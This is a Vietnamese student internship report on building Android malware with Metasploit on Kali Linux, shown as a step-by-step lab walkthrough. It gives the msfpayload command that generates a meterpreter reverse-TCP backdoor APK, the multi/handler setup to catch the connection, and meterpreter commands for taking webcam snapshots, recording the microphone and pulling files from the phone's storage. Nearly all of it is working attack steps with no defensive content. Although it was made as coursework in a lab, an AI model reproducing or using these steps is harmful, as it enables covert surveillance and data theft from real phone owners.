tuan2
TRANSCRIPT
![Page 1: Tuan2](https://reader035.vdocuments.net/reader035/viewer/2022071815/55a8acdf1a28ab842a8b47f1/html5/thumbnails/1.jpg)
Sinh viên thực hiện : NGUYỄN QUỐC VƯƠNG . Lớp CNTT . Ca sáng 3 – 5 - 7
Báo cáo thực tập
Đề tài 5 : Nghiên cứu các Trojan ,Malware cho phép đánh cắp dữ liệu như danh sách contact ,
tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài
NGHIÊN CỨU CƠ CHẾ TẠO MÃ ĐỘC TRÊN KALI LINUX
- Đầu tiên
, kiểm tra địa chỉ IP bằng : ifconfig
Địa chỉ IP : 192.168.1.14
- Khởi động terminal và gõ dòng lệnh sau:
Msfpayload android/meterpreter/reverse_tcp lhost=192.168.1.14 lport=8080 R >
/root/Desktop/test.apk
![Page 2: Tuan2](https://reader035.vdocuments.net/reader035/viewer/2022071815/55a8acdf1a28ab842a8b47f1/html5/thumbnails/2.jpg)
- Máy sẽ tạo 1 file .apk ở bên ngoài desktop , kiểm tra kích thước của file để chắc là file đã
tạo thành công
![Page 3: Tuan2](https://reader035.vdocuments.net/reader035/viewer/2022071815/55a8acdf1a28ab842a8b47f1/html5/thumbnails/3.jpg)
- Tiếp theo gõ lệnh : msfconsole
- Sau khi msfconsole load xong , ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ
lệnh sau:
Use exploit/multi/handler
Set payload/meterpreter/reverse_tcp
Set lhost 192.168.1.14 – Địa chỉ IP đã kiểm tra ban đầu
Set lport 8080 – nhập port giống với khi tạo payload ở trên
Exploit
- Sau đó màn hình sẽ hiện ra như bên dưới , lúc này đang chờ 1 máy android mở backdoor.
![Page 4: Tuan2](https://reader035.vdocuments.net/reader035/viewer/2022071815/55a8acdf1a28ab842a8b47f1/html5/thumbnails/4.jpg)
- Thử giả lập 1 điện thoại và tải file test.apk về và tiến hành cài đặt :
![Page 5: Tuan2](https://reader035.vdocuments.net/reader035/viewer/2022071815/55a8acdf1a28ab842a8b47f1/html5/thumbnails/5.jpg)
- Sau khi cài đặt hoàn tất thì việc kết nối với 1 android đã được thực hiện , lúc này ở console
xuất hiện :
![Page 6: Tuan2](https://reader035.vdocuments.net/reader035/viewer/2022071815/55a8acdf1a28ab842a8b47f1/html5/thumbnails/6.jpg)
- Ta có thể gõ lệnh help để biết được các lệnh :
![Page 7: Tuan2](https://reader035.vdocuments.net/reader035/viewer/2022071815/55a8acdf1a28ab842a8b47f1/html5/thumbnails/7.jpg)
- Có một số lệnh cơ bản như
Để xem thông tin máy : sysinfo
Để sử dụng camera: webcam_list (xem danh sách camera)
Webcam_snap x (sử dụng camera của android)
Để ghi âm : record_mic
Lấy file từ sdcard: cd/sdcard và ls (để xem danh sách thư mục,file)
cd/sdcard/download (để tải về máy )